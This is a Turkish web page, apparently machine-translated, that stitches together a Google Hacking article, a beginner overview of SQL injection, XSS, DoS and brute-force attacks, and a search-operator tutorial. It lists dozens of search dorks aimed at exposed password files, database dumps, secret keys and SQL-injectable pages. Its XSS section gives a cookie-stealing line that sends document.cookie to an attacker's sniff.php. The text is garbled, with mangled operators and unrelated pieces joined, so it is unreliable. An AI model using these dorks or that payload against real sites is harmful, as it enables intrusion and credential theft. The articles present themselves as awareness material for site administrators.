Kali Linux'ta SQL Enjeksiyonlarını aramak ve kullanmak için çok işlevli bir araç olan jSQL Enjeksiyonu kullanma talimatları. İstenen gizli Inurl tek php kimliğini bulmak için az bilinen Google işlevlerini kullanma

  • 02.07.2020

Google ile Hacking

Alexander Antipov

Google arama motoru (www.google.com) birçok arama seçeneği sunar. Tüm bu yetenekler, ilk kez İnternet kullanıcısı için paha biçilmez bir arama aracıdır ve aynı zamanda, sadece bilgisayar korsanları değil, bilgisayar suçluları ve hatta teröristler de dahil olmak üzere, kötü niyetli kişilerin elinde daha da güçlü bir istila ve yıkım silahıdır.
(1 haftada 9475 görüntüleme)


Denis Batrankov
denisNOSPAMixi.ru

Dikkat:Bu makale bir eylem rehberi değildir. Bu makale siz, WEB sunucularının yöneticileri için yazılmıştır, böylelikle güvende olduğunuz yanlış duygusunu yitirirsiniz ve sonunda bu bilgi alma yönteminin sinsiliğini anlarsınız ve sitenizi korumaya başlarsınız.

Giriş

Örneğin, 0.14 saniyede 1670 sayfa buldum!

2. Başka bir satır ekleyelim, örneğin:

inurl: "auth_user_file.txt"

biraz daha az, ancak bu zaten ücretsiz indirme ve kaba kuvvet saldırıları için yeterli (aynı John The Ripper'ı kullanarak). Aşağıda biraz daha örnek vereceğim.

Bu nedenle, Google arama motorunun İnternet'teki sitelerin çoğunu ziyaret ettiğini ve içlerinde bulunan bilgileri önbellekte sakladığını anlamanız gerekir. Önbelleğe alınan bu bilgiler, siteye doğrudan bağlantı olmadan site ve sitenin içeriği hakkında bilgi almanıza olanak tanır, yalnızca Google'da depolanan bilgileri araştırarak. Ayrıca, sitedeki bilgiler artık mevcut değilse, önbellekteki bilgiler yine de korunabilir. Bu yöntem için gereken tek şey, bazı Google anahtar kelimelerini bilmektir. Bu tekniğe Google Hacking denir.

Google Hacking ile ilgili bilgiler ilk kez 3 yıl önce Bugtruck posta listesinde yer aldı. 2001 yılında bu konu bir Fransız öğrenci tarafından gündeme getirildi. İşte bu mektubun bağlantısı http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Bu tür taleplerin ilk örneklerini sağlar:

1) / admin dizini
2) / şifre dizini
3) / posta dizini
4) / + banques + dosya türü dizini: xls (Fransa için ...)
5) / + passwd dizini
6) / password.txt dizini

Bu konu, kısa süre önce İnternet'in İngilizce okuma bölümünde bir sıçrama yaptı: Johnny Long'un 7 Mayıs 2004'te yayınlanan makalesinden sonra. Google Hacking hakkında daha kapsamlı bir çalışma için, bu yazarın http://johnny.ihackstuff.com adresindeki sitesini ziyaret etmenizi öneririm. Bu yazıda sadece sizi güncel tutmak istiyorum.

Kimler kullanabilir:
- Gazeteciler, casuslar ve kendi işlerine burnunu sokmaktan hoşlanan tüm insanlar, ödün veren kanıtları aramak için bunu kullanabilir.
- Bilgisayar korsanlığı için uygun hedefler arayan bilgisayar korsanları.

Google nasıl çalışır?

Sohbete devam etmek için, size Google sorgularında kullanılan bazı anahtar kelimeleri hatırlatmama izin verin.

+ İşaretini kullanarak arayın

Google, Google için önemsiz olan kelimeleri hariç tutar. Örneğin, İngilizce soru kelimeleri, edatları ve makaleler: örneğin are, of, where. Rusça'da Google, tüm kelimeleri önemli görüyor gibi görünüyor. Kelime aramadan çıkarılırsa, Google bunun hakkında yazar. Google'ın önünde bu kelimelerin bulunduğu sayfaları aramaya başlaması için, kelimenin önüne boşluk bırakmadan + işareti eklemeniz gerekir. Örneğin:

as + baz

Bir işaret kullanarak ara -

Google, belirli bir konuyu içeren sayfaları hariç tutmanın gerekli olduğu çok sayıda sayfa bulursa, Google'ı yalnızca belirli kelimeleri olmayan sayfaları aramaya zorlayabilirsiniz. Bunu yapmak için, bu kelimeleri, her işaretin önüne koyarak - kelimenin önüne boşluk bırakmadan belirtmeniz gerekir. Örneğin:

balıkçılık votkası

~ İle ara

Yalnızca belirtilen kelimeyi değil aynı zamanda eş anlamlılarını da bulmak isteyebilirsiniz. Bunu yapmak için, ~ sembolü olan kelimenin önüne getirin.

Çift tırnak kullanarak tam cümleyi bulma

Google, sorgu dizesine yazdığınız kelimelerin tüm oluşumlarını her sayfada arar ve kelimelerin göreceli konumlarını önemsemez, asıl önemli olan, belirtilen tüm kelimelerin aynı anda sayfada olmasıdır (bu varsayılan eylemdir). Tam ifadeyi bulmak için, onu tırnak içine almanız gerekir. Örneğin:

"kitap sonu"

Belirtilen sözcüklerden en az birine sahip olmak için mantıksal işlemi açıkça belirtmeniz gerekir: VEYA. Örneğin:

kitap güvenliği VEYA koruma

Ek olarak, arama çubuğunda herhangi bir kelimeyi belirtmek için * işaretini kullanabilirsiniz ve. herhangi bir karakteri belirtmek için.

Ek operatörler kullanarak kelimeleri bulmak

Arama dizesinde şu biçimde belirtilen arama operatörleri vardır:

operatör: search_term

Kolonun yanında boşluklar gerekli değildir. İki noktadan sonra bir boşluk eklerseniz, bir hata mesajı görürsünüz ve ondan önce, Google bunları normal bir arama dizesi olarak kullanır.
Ek arama operatörü grupları vardır: diller - sonucu hangi dilde görmek istediğinizi belirtin, tarih - son üç, altı veya 12 aydaki sonuçları sınırlayın - bir dizenin aranacağı yeri belgede belirtin: her yerde, başlıkta, URL'de, alanlar - belirtilen sitede arama yapın veya tam tersine, arama dışında tutun, güvenli arama - belirtilen türde bilgileri içeren siteleri engeller ve bunları arama sonuçları sayfalarından kaldırır.
Ancak, bazı operatörler ek bir parametreye ihtiyaç duymazlar, örneğin sorgu " önbellek: www.google.com"tam teşekküllü bir arama dizesi olarak adlandırılabilir ve bazı anahtar kelimeler, bunun tersine, bir arama kelimesi gerektirir, örneğin" site: www.google.com yardımı". Konumuzun ışığında, aşağıdaki operatörlere bakalım:

Şebeke

Açıklama

Ek bir parametre mi gerektirir?

sadece search_term'de belirtilen sitede ara

sadece search_term türüne sahip belgelerde ara

başlığında search_term içeren sayfaları bul

başlıkta tüm search_term kelimelerini içeren sayfaları bul

url'sinde search_term kelimesini içeren sayfaları bul

url'sinde tüm search_term kelimelerini içeren sayfaları bul

Şebeke site: aramayı yalnızca belirtilen siteyle sınırlar ve yalnızca alan adını değil aynı zamanda IP adresini de belirtebilirsiniz. Örneğin, şunu girin:

Şebeke dosya tipi: aramaları belirli bir türdeki dosyalarla sınırlar. Örneğin:

Makalenin yayınlanma tarihi itibariyle, Google 13 farklı dosya biçiminde arama yapabilir:

  • Adobe Taşınabilir Belge Biçimi (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
  • Lotus WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel (xls)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word (doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Yazma (yazar)
  • Zengin Metin Biçimi (rtf)
  • Shockwave Flash (swf)
  • Metin (ans, txt)

Şebeke bağlantı: belirtilen sayfaya işaret eden tüm sayfaları gösterir.
İnternette kaç yerin hakkınızda bilgi sahibi olduğunu görmek muhtemelen her zaman ilginçtir. Denemek:

Şebeke önbellek: Google'ın bu sayfayı en son ziyaret ettiğinde göründüğü haliyle sitenin sürümünü Google'ın önbelleğinde gösterir. Sık değişen herhangi bir siteyi alıp şunları ararız:

Şebeke intitle: Sayfa başlığında belirtilen kelimeyi arar. Şebeke allintitle: bir uzantıdır - sayfa başlığında belirtilen tüm birden çok kelimeyi arar. Karşılaştırmak:

intitle: Mars'a uçuş
intitle: flight intitle: intitle: mars
allintitle: Mars'a uçuş

Şebeke inurl:google'ın URL'de belirtilen dizeyi içeren tüm sayfaları göstermesini sağlar. Operatör allinurl: Bir URL'deki tüm kelimeleri arar. Örneğin:

allinurl: asit acid_stat_alerts.php

Bu komut özellikle SNORT'a sahip olmayanlar için kullanışlıdır - en azından gerçek bir sistemde nasıl çalıştığını görebilirler.

Google ile bilgisayar korsanlığı yöntemleri

Bu nedenle, yukarıdaki operatörlerin ve anahtar kelimelerin bir kombinasyonunu kullanarak, herkesin gerekli bilgileri toplayabileceğini ve güvenlik açıklarını arayabileceğini gördük. Bu teknikler genellikle Google Hacking olarak adlandırılır.

site haritası

Google'ın sitede bulduğu tüm bağlantıları görmek için site: operatörünü kullanabilirsiniz. Genellikle, komut dosyaları tarafından dinamik olarak oluşturulan sayfalar parametreler kullanılarak dizine eklenmez, bu nedenle bazı siteler ISAPI filtreleri kullanır, böylece bağlantılar formda olmaz /article.asp?num\u003d10&dst\u003d5ve eğik çizgilerle / makale / abc / num / 10 / dst / 5... Bu, sitenin genel olarak arama motorları tarafından dizine alınması için yapılır.

Hadi deneyelim:

site: www.whitehouse.gov whitehouse

Google, sitedeki her sayfanın whitehouse kelimesini içerdiğini düşünüyor. Tüm sayfaları almak için kullandığımız şey bu.
Ayrıca basitleştirilmiş bir versiyon da var:

site: whitehouse.gov

Ve en iyi yanı, whitehouse.gov'daki yoldaşların sitelerinin yapısına ve hatta Google'ın kendisi için indirdiği önbelleğe alınmış sayfalara baktığımızı bile bilmiyorlardı. Bu, sitelerin yapısını incelemek ve içeriği görüntülemek için kullanılabilir, ancak şimdilik fark edilmeden kalır.

Dizinlerdeki dosyaların listesini görüntüleme

WEB sunucuları, normal HTML sayfaları yerine sunucu dizinlerinin listelerini görüntüleyebilir. Bu genellikle kullanıcıların belirli dosyaları seçmesini ve indirmesini sağlamak için yapılır. Ancak çoğu durumda, yöneticilerin bir dizinin içeriğini göstermesi yeterli değildir. Bu, sunucunun yanlış yapılandırılması veya dizinde ana sayfanın olmaması nedeniyle oluşur. Sonuç olarak, bilgisayar korsanı dizinde ilginç bir şey bulma ve onu kendi amaçları için kullanma şansına sahiptir. Bu tür sayfaların tümünü bulmak için, hepsinin başlıklarında: indeks kelimelerini içerdiğine dikkat edin. Ancak kelime dizini yalnızca bu tür sayfaları içermediğinden, sorguyu netleştirmemiz ve sayfanın kendisindeki anahtar kelimeleri hesaba katmamız gerekir, böylece formun sorguları bize uyacaktır:

intitle: index.of üst dizin
intitle: index.of ad boyutu

Dizin listelerinin çoğu kasıtlı olduğundan, ilk seferinde hatalı listeleri bulmakta zorlanabilirsiniz. Ancak en azından aşağıda açıklandığı gibi WEB sunucusunun sürümünü belirlemek için listeleri zaten kullanabilirsiniz.

WEB sunucusunun sürümünü edinme.

WEB sunucusunun sürümünü bilmek, herhangi bir hacker saldırısına başlamadan önce her zaman yararlıdır. Yine Google sayesinde bir sunucuya bağlanmadan bu bilgileri alabilirsiniz. Dizinin listesine yakından bakarsanız, WEB sunucusunun adının ve sürümünün orada görüntülendiğini görebilirsiniz.

Apache1.3.29 - trf296.free.fr Bağlantı Noktası 80'deki ProXad Sunucusu

Deneyimli bir yönetici bu bilgiyi değiştirebilir, ancak kural olarak doğrudur. Bu nedenle, bu bilgileri almak için bir talep göndermeniz yeterlidir:

intitle: index.of server.at

Belirli bir sunucu için bilgi almak için talebi açıklığa kavuşturuyoruz:

intitle: index.of server.at site: ibm.com

Veya tam tersi, belirli bir sunucu sürümünde çalışan sunucuları arıyoruz:

intitle: index.of Apache / 2.0.40 Sunucusu adresinde

Bu teknik, bir hacker tarafından bir kurbanı bulmak için kullanılabilir. Örneğin, WEB sunucusunun belirli bir sürümü için bir istismar varsa, onu bulabilir ve mevcut istismarı deneyebilir.

WEB sunucusunun en son sürümünü kurarken varsayılan olarak yüklenen sayfalara bakarak da sunucu sürümünü edinebilirsiniz. Örneğin, Apache 1.2.6 test sayfasını görmek için şunu yazın:

intitle: Test.Page.for.Apache it.worked!

Ayrıca, bazı işletim sistemleri kurulum sırasında WEB sunucusunu hemen kurar ve çalıştırır. Ancak bazı kullanıcılar bunun farkında bile değil. Doğal olarak, birinin varsayılan sayfayı silmediğini görürseniz, bilgisayarın herhangi bir yapılandırmaya tabi tutulmadığını ve muhtemelen saldırılara açık olduğunu varsaymak mantıklıdır.

IIS 5.0 sayfalarını bulmaya çalışın

allintitle: Windows 2000 İnternet Hizmetleri'ne Hoş Geldiniz

IIS durumunda, yalnızca sunucu sürümünü değil, aynı zamanda Windows sürümünü ve Hizmet Paketini de belirleyebilirsiniz.

WEB sunucusunun sürümünü belirlemenin bir başka yolu, siteye varsayılan olarak yüklenebilecek kılavuzları (yardım sayfaları) ve örnekleri aramaktır. Bilgisayar korsanları, bir siteye ayrıcalıklı erişim elde etmek için bu bileşenleri kullanmanın birçok yolunu buldular. Bu nedenle bu bileşenleri üretim sahasından kaldırmanız gerekir. Bu bileşenlerin varlığıyla sunucunun türü ve sürümü hakkında bilgi alabileceğiniz gerçeğinden bahsetmiyorum bile. Örneğin, apache kılavuzunu bulun:

inurl: manuel apache yönergeleri modülleri

Google'ı bir CGI tarayıcısı olarak kullanma.

CGI tarayıcı veya WEB tarayıcı, kurbanın sunucusundaki savunmasız komut dosyalarını ve programları bulmak için bir yardımcı programdır. Bu yardımcı programlar neyi arayacaklarını bilmelidir, bunun için tüm savunmasız dosyalar listesine sahiptirler, örneğin:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

Bu dosyaların her birini Google'ı kullanarak arama çubuğundaki dosya adına ek olarak index of veya inurl kullanarak bulabiliriz: güvenlik açığı olan komut dosyalarına sahip siteleri bulabiliriz, örneğin:

allinurl: /random_banner/index.cgi

Ek bilgi kullanarak, bir bilgisayar korsanı bir komut dosyası güvenlik açığından yararlanabilir ve bu güvenlik açığını, komut dosyasını sunucuda depolanan herhangi bir dosyayı döndürmeye zorlamak için kullanabilir. Örneğin bir şifre dosyası.

Kendinizi Google korsanlığından nasıl koruyabilirsiniz?

1. WEB sunucusuna önemli verileri göndermeyin.

Verileri geçici olarak göndermiş olsanız bile, unutabilirsiniz veya birisinin siz silmeden önce bu verileri bulması ve toplaması için zamanı olacaktır. Bunu yapma. Verileri hırsızlıktan korumak için aktarmanın başka birçok yolu vardır.

2. Sitenizi kontrol edin.

Sitenizi araştırmak için açıklanan yöntemleri kullanın. Http://johnny.ihackstuff.com sitesinde görünen yeni yöntemlerle sitenizi periyodik olarak kontrol edin. Eylemlerinizi otomatikleştirmek istiyorsanız, Google'dan özel izin almanız gerektiğini unutmayın. Dikkatli okursan http://www.google.com/terms_of_service.html daha sonra şu ifadeyi göreceksiniz: Google'ın önceden açık izni olmadan Google'ın sistemine hiçbir türden otomatik sorgu gönderemezsiniz.

3. Sitenizi veya bir kısmını dizine eklemek için Google'a ihtiyacınız olmayabilir.

Google, sitenize veya bir kısmına giden bir bağlantıyı veritabanından kaldırmanıza ve ayrıca sayfaları önbellekten kaldırmanıza izin verir. Ayrıca, sitenizde görsel aramayı yasaklayabilir, arama sonuçlarında kısa sayfa bölümlerinin gösterilmesini yasaklayabilirsiniz.Bir siteyi kaldırmak için tüm seçenekler sayfada açıklanmıştır. http://www.google.com/remove.html ... Bunu yapmak için, bu sitenin gerçekten sahibi olduğunuzu onaylamanız veya sayfaya etiket eklemeniz veya

4. robots.txt kullanın

Arama motorlarının sitenin kök dizininde bulunan robots.txt dosyasına baktığı ve kelimesi ile işaretlenen parçaları dizine eklemediği bilinmektedir. İzin verme... Sitenin bir kısmının dizine eklenmesini önlemek için bundan yararlanabilirsiniz. Örneğin, tüm sitenin dizine eklenmesini önlemek için iki satır içeren bir robots.txt dosyası oluşturun:

Kullanıcı aracısı: *
İzin verme: /

Başka ne olur

Öyle ki hayat size bal gibi gelmiyor, sonunda şunu söyleyeceğim, yukarıdaki yöntemleri kullanarak betiklerde ve WEB sunucularında delik arayan kişileri takip eden siteler var. Böyle bir sayfaya bir örnek

Uygulama.

Biraz tatlı. Aşağıdaki listeden bir şeyi kendiniz deneyin:

1. #mysql dump dosya türü: sql - mySQL veritabanlarının dökümlerini bulun
2. Ana Bilgisayar Güvenlik Açığı Özeti Raporu - diğer kişilerin bulduğu güvenlik açıklarını size gösterecektir
3.phpMyAdmin inurl: main.php üzerinde çalışıyor - bu phpmyadmin paneli aracılığıyla kapatmayı zorlar
4. dağıtım için gizli değil
5. Talep Ayrıntıları Kontrol Ağacı Sunucu Değişkenleri
6. Çocuk modunda çalıştırma
7. Bu rapor WebLog tarafından oluşturulmuştur
8. intitle: index.of cgiirc.config
9. dosya tipi: conf inurl: firewall -intitle: cvs - herkes güvenlik duvarı yapılandırma dosyalarına ihtiyaç duyabilir mi? :)
10. intitle: index.of finances.xls - hmm ....
11. intitle: dbconvert.exe sohbetlerinin dizini - icq sohbet günlükleri
12. metin: Tobias Oetiker trafik analizi
13. intitle: Webalizer Tarafından Oluşturulan Kullanım İstatistikleri
14. intitle: gelişmiş web istatistiklerinin istatistikleri
15. intitle: index.of ws_ftp.ini - ws ftp yapılandırması
16.inurl: ipsec.secrets paylaşılan sırları barındırır - gizli anahtar iyi bir keşiftir
17.inurl: main.php phpMyAdmin'e Hoş Geldiniz
18.inurl: server-info Apache Server Information
19. site: eğitsel yönetici notları
20. ORA-00921: SQL komutunun beklenmeyen sonu - yolları alınıyor
21. intitle: index.of trillian.ini
22. intitle: pwd.db dizini
23. intitle: index.of people.lst
24. intitle: index.of master.passwd
25. inurl: passlist.txt
26. intitle: .mysql_history dizini
27. intitle: intext indeksi: globals.inc
28. intitle: index.of administrators.pwd
29. intitle: Index.of vb gölge
30. intitle: index.of secring.pgp
31.inurl: config.php dbuname dbpass
32. inurl: dosya türü: ini gerçekleştir

  • "Hacking mit Google"
  • Eğitim merkezi "Informzashita" http://www.itsecurity.ru - bilgi güvenliği eğitimi alanında önde gelen uzmanlık merkezi (Moskova Eğitim Komitesi Lisansı No. 015470, Devlet akreditasyonu No. 004251). Rusya ve BDT ülkelerindeki İnternet Güvenlik Sistemleri ve Clearswift için yetkili tek eğitim merkezi. Microsoft Yetkili Eğitim Merkezi (Güvenlik uzmanlığı). Eğitim programları Rusya Devlet Teknik Komisyonu FSB (FAPSI) ile koordine edilmektedir. Mesleki gelişimle ilgili eğitim sertifikaları ve devlet belgeleri.

    SoftKey, alıcılar, geliştiriciler, bayiler ve bağlı iş ortakları için benzersiz bir hizmettir. Buna ek olarak, Rusya, Ukrayna ve Kazakistan'daki en iyi çevrimiçi yazılım mağazalarından biridir ve müşterilerine geniş bir ürün yelpazesi, birçok ödeme yöntemi, hızlı (genellikle anında) sipariş işleme, kişisel bölümde sipariş yürütme sürecini izleme, mağaza ve üreticilerden çeşitli indirimler sunar. TARAFINDAN.

    Bilgi güvenliği hakkında biraz konuşmaya karar verdim. Makale, acemi programcılar ve Ön Uç geliştirmeye yeni başlayanlar için faydalı olacaktır. Sorun nedir?

    Birçok acemi geliştirici, kod yazmaya o kadar bağımlıdır ki işlerinin güvenliğini tamamen unuturlar. Ve en önemlisi, SQL sorgusu, XXS gibi güvenlik açıklarını unuturlar. Ayrıca yönetici panelleri için hafif şifreler bulurlar ve kaba kuvvete maruz kalırlar. Bu saldırılar nelerdir ve nasıl önlenebilir?

    SQL enjeksiyonu

    SQL enjeksiyonu, belirli bir DBMS için bir SQL sorgusu ile gerçekleştirilen en yaygın veritabanı saldırısı türüdür. Birçok insan ve hatta büyük şirketler bu tür saldırılardan muzdariptir. Bunun nedeni, geliştiricinin veritabanı yazarken yaptığı hata ve aslında SQL sorgularıdır.

    SQL sorgularında kullanılan giriş verilerinin yanlış işlenmesi nedeniyle bir SQL enjeksiyon saldırısı mümkündür. Bir bilgisayar korsanı bir saldırıyı başarıyla tamamlarsa, yalnızca veri tabanlarının içeriğini değil, aynı zamanda sırasıyla yönetim panelinin parolalarını ve günlüklerini de kaybetme riskiniz vardır. Ve bu veriler, siteyi tamamen ele geçirmek veya üzerinde geri dönüşü olmayan ayarlamalar yapmak için oldukça yeterli olacaktır.

    Saldırı, PHP, ASP, Perl ve diğer dillerde yazılan komut dosyalarında başarıyla yeniden oluşturulabilir. Bu tür saldırıların başarısı daha çok hangi DBMS'nin kullanıldığına ve betiğin kendisinin nasıl uygulandığına bağlıdır. Dünyada çok sayıda savunmasız SQL enjeksiyon sitesi var. Bunu doğrulamak kolaydır. "Dorks" girmeniz yeterlidir - bunlar savunmasız siteleri bulmak için özel isteklerdir. Bunlardan bazıları:

    • inurl: index.php? id \u003d
    • inurl: trainers.php? id \u003d
    • inurl: buy.php? kategori \u003d
    • inurl: article.php? ID \u003d
    • inurl: play_old.php? id \u003d
    • inurl: declaration_more.php? decl_id \u003d
    • inurl: pageid \u003d
    • inurl: games.php? id \u003d
    • inurl: page.php? dosya \u003d
    • inurl: newsDetail.php? id \u003d
    • inurl: gallery.php? id \u003d
    • inurl: article.php? id \u003d

    Bunları nasıl kullanacaksınız? Bunları bir Google veya Yandex arama motoruna girmeniz yeterlidir. Arama motoru size yalnızca savunmasız bir site değil, aynı zamanda bu güvenlik açığı için bir sayfa da verecektir. Ancak bunun üzerinde durmayacağız ve sayfanın gerçekten savunmasız olduğundan emin olmayacağız. Bunu yapmak için, "id \u003d 1" değerinden sonra tek bir tırnak işareti "" "koymak yeterlidir. Bunun gibi bir şey:

    • inurl: games.php? id \u003d 1 '

    Ve site bize SQL sorgusu ile ilgili bir hata verecektir. Bilgisayar korsanımızın bundan sonra neye ihtiyacı var?

    Ve sonra hata sayfasına giden bu bağlantıya ihtiyacı var. Ardından, çoğu durumda, güvenlik açığı ile ilgili çalışma, bu bölüm için yardımcı programlarıyla birlikte Kali linux dağıtımında gerçekleşir: enjeksiyon kodunu enjekte etmek ve gerekli işlemleri yapmak. Bunun nasıl olacağını size söyleyemem. Ancak bununla ilgili bilgileri internette bulabilirsiniz.

    XSS Saldırısı

    Bu tür saldırılar çerezlere yapılır. Kullanıcılar da onları kurtarmaya çok düşkündür. Neden olmasın? Onlar olmadan nasıl? Nitekim Çerezler sayesinde Vk.com veya Mail.ru'dan şifreyi yüz kez kullanmıyoruz. Ve onları reddedenlerin birkaçı. Ancak internette bilgisayar korsanları için genellikle bir kural vardır: kolaylık faktörü, güvensizlik faktörü ile doğru orantılıdır.

    Bir XSS saldırısı uygulamak için bilgisayar korsanımızın JavaScript bilgisine ihtiyacı var. İlk bakışta dil çok basit ve zararsızdır çünkü bilgisayar kaynaklarına erişimi yoktur. Bir bilgisayar korsanı JavaScript ile yalnızca bir tarayıcıda çalışabilir, ancak bu yeterlidir. Sonuçta, asıl önemli olan kodu web sayfasına girmektir.

    Saldırı süreci hakkında detaylı konuşmayacağım. Bunun nasıl gerçekleştiğinin temellerini ve anlamını size anlatacağım.

    Bir bilgisayar korsanı, bir foruma veya ziyaretçi defterine JS kodu ekleyebilir:

    Komut dosyaları bizi, kodun yürütüleceği virüslü sayfaya yönlendirecektir: bir algılayıcı, bir tür depolama veya bir şekilde Çerezlerimizi önbellekten çalacak bir istismar.

    Neden JavaScript? Çünkü JavaScript, web istekleriyle iyi anlaşır ve çerezlere erişimi vardır. Ancak komut dosyamız bizi bir siteye aktarırsa, kullanıcı bunu kolayca fark eder. Burada bilgisayar korsanı daha kurnaz bir seçenek kullanıyor - sadece kodu resmin içine yazıyor.

    Img \u003d yeni Resim ();

    Img.src \u003d ”http://192.168.1.7/sniff.php?32+document.cookie;

    Sadece bir resim oluşturuyoruz ve komut dosyamızı bir adres olarak atıyoruz.

    Kendinizi tüm bunlardan nasıl korursunuz? Çok basit - şüpheli bağlantılara tıklamayın.

    DoS ve DDos Saldırıları


    DoS (İngilizce Hizmet Reddinden) - hizmet reddi) - bir bilgisayar sistemine, onu başarısızlığa uğratmak amacıyla yapılan bir hacker saldırısı. Bu, sistemin vicdanlı kullanıcılarının sağlanan sistem kaynaklarına (sunuculara) erişemediği veya bu erişimin zor olduğu koşulların yaratılmasıdır. Acil bir durumda yazılım herhangi bir kritik bilgi verirse, sistemin başarısızlığı, ele geçirilmesine doğru bir adım olabilir: örneğin, sürüm, program kodunun bir kısmı, vb. Ancak çoğu zaman bu, ekonomik baskının bir ölçüsüdür: gelir getiren basit bir hizmetin kaybı. Sağlayıcıdan alınan faturalar veya bir saldırıyı önlemek için alınan önlemler hedefi önemli ölçüde vurur. Şu anda, DoS ve DDoS saldırıları, yasal olarak önemli kanıtlar bırakmadan hemen hemen her sistemin başarısız olmasına izin verdiği için en popüler olanıdır.

    DoS ve DDos saldırıları arasındaki fark nedir?

    DoS, akıllıca oluşturulmuş bir saldırıdır. Örneğin, sunucu gelen paketlerin doğruluğunu kontrol etmezse, o zaman bir bilgisayar korsanı sonsuza kadar işlenecek böyle bir talepte bulunabilir ve diğer bağlantılarla çalışmak için yeterli CPU zamanı olmayacaktır. Buna göre, müşteriler bir hizmet reddi alacaklardır. Ancak, tanınmış büyük siteleri bu şekilde aşırı yüklemek veya devre dışı bırakmak işe yaramayacaktır. Oldukça geniş kanallar ve süper güçlü sunucularla donatılmışlardır ve böylesi bir aşırı yük ile sorunsuz bir şekilde baş edebilirler.

    DDoS aslında DoS ile aynı saldırıdır. Ancak DoS'de bir istek paketi varsa, DDoS'de yüzlerce veya daha fazla olabilir. Süper güçlü sunucular bile bu aşırı yüklemeyi kaldıramayabilir. Sana bir örnek vereyim.

    DoS saldırısı, biriyle sohbet ettiğiniz zamandır, ancak daha sonra kötü huylu bir kişi gelir ve yüksek sesle bağırmaya başlar. Aynı zamanda konuşmak ya imkansız ya da çok zor. Çözüm: Kişiyi sakinleştirecek ve odadan çıkaracak güvenliği çağırın. DDoS saldırıları, bu kadar kötü huylu insanların binlerce kişi tarafından aceleye getirildiği zamandır. Bu durumda, gardiyanlar herkesi büküp alamayacaklar.

    DoS ve DDoS, zombi adı verilen bilgisayarlardan üretilir. Bunlar, makinelerinin bir sunucuya yapılan bir saldırıya karıştığından şüphelenmeyen bilgisayar korsanları tarafından saldırıya uğramış kullanıcıların bilgisayarlarıdır.

    Kendinizi bundan nasıl korursunuz? Genel olarak hiçbir şey. Ancak bir bilgisayar korsanı için görevi karmaşıklaştırabilirsiniz. Bunu yapmak için, güçlü sunuculara sahip iyi bir barındırma seçmeniz gerekir.

    Bruteforce saldırısı

    Bir geliştirici, saldırılara karşı birçok koruma sistemi geliştirebilir, yazdığımız komut dosyalarını tam olarak görüntüleyebilir, sitedeki güvenlik açıklarını kontrol edebilir vb. Ancak site düzeninin son aşamasına gelince, yani yönetici paneline şifre koymanın kolay olacağı zaman, bir şeyi unutabilir. Parola!

    Basit bir parola belirlemeniz kesinlikle önerilmez. 12345, 1114457, vasya111, vb. Olabilir. 10-11 karakterden daha kısa şifrelerin ayarlanması önerilmez. Aksi takdirde, en yaygın ve zor olmayan saldırıya maruz kalabilirsiniz - Brute force.

    Brute force, özel programlar kullanan sözlük tabanlı bir parola brute-force saldırısıdır. Sözlükler farklı olabilir: Latince, sayılarla numaralandırma, belirli bir aralığa kadar diyelim, karışık (Latin + sayılar) ve hatta @ # 4 $% & * ~~ `` '' @ benzersiz sembollere sahip sözlükler var mı? vb.

    Elbette bu tür saldırılardan karmaşık bir parola oluşturularak kolayca önlenebilir. Captcha bile sizi kurtarabilir. Ayrıca, siteniz bir CMS üzerinde yapılmışsa, çoğu bu tür saldırıları hesaplar ve ip'i engeller. Şifrede ne kadar çok karakter varsa, onu bulmanın o kadar zor olduğunu her zaman hatırlamalısınız.

    Hackerlar nasıl çalışır? Çoğu durumda, önceden şifreden şüphelenir veya bir kısmını bilirler. Kullanıcının şifresinin kesinlikle 3 veya 5 karakterden oluşmayacağını varsaymak oldukça mantıklıdır. Bu parolalar, sık sık saldırılara yol açar. Temel olarak, bilgisayar korsanları 5 ila 10 karakter arasında bir aralık alır ve oraya muhtemelen önceden bildikleri birkaç karakter ekler. Ardından, gerekli aralıklara sahip şifreler oluşturulur. Kali linux dağıtımı, bu tür durumlar için programlar bile içerir. Ve işte, sözlüğün hacmi artık çok büyük olmadığı için saldırı artık uzun sürmeyecek. Ek olarak, bir bilgisayar korsanı video kartının gücünü kullanabilir. Bazıları CUDA sistemini destekler ve arama hızı 10 kata kadar artar. Ve şimdi bu kadar basit bir şekilde bir saldırının oldukça gerçek olduğunu görüyoruz. Ancak yalnızca web siteleri kaba kuvvete tabi değildir.

    Sevgili geliştiriciler, bilgi güvenliği sistemini asla unutmayın, çünkü bugün eyaletler dahil birçok insan bu tür saldırılardan muzdariptir. Sonuçta, en büyük güvenlik açığı, her zaman bir yerde dikkati dağılabilen veya bir yeri gözden kaçırmayan bir kişidir. Biz programcıyız, ancak programlanmış makineler değiliz. Her zaman tetikte olun, çünkü bilgi kaybı ciddi sonuçlarla tehdit ediyor!

    Google.com ile nasıl doğru arama yapılır?

    Muhtemelen herkes Google gibi bir arama motorunun nasıl kullanılacağını biliyor \u003d) Ancak, özel yapılar kullanarak bir arama sorgusunu doğru bir şekilde oluşturduğunuzda aradığınız sonuçlara çok daha verimli ve daha hızlı ulaşabileceğinizi herkes bilmiyor \u003d) Bu yazıda bunu göstermeye çalışacağım ve doğru arama yapmak için nasıl yapmanız gerektiğini

    Google, google.com'da arama yaparken özel anlamı olan birkaç gelişmiş arama operatörünü destekler. Tipik olarak, bu operatörler aramayı değiştirir veya hatta Google'a tamamen farklı türde aramalar yapmasını söyler. Örneğin inşaat bağlantı: özel bir operatör ve istek bağlantı: www.google.com size normal bir arama sağlamaz, bunun yerine google.com'a bağlantıları olan tüm web sayfalarını bulur.
    alternatif istek türleri

    önbellek: Sorgunuza başka kelimeler eklerseniz, Google önbelleğe alınan belgede bulunan kelimeleri vurgular.
    Örneğin, önbellek: www.web sitesi önbelleğe alınmış içeriği "web" kelimesi vurgulanmış olarak gösterir.

    bağlantı: yukarıda tartışılan arama sorgusu, belirtilen sorguya bağlantılar içeren web sayfalarını gösterecektir.
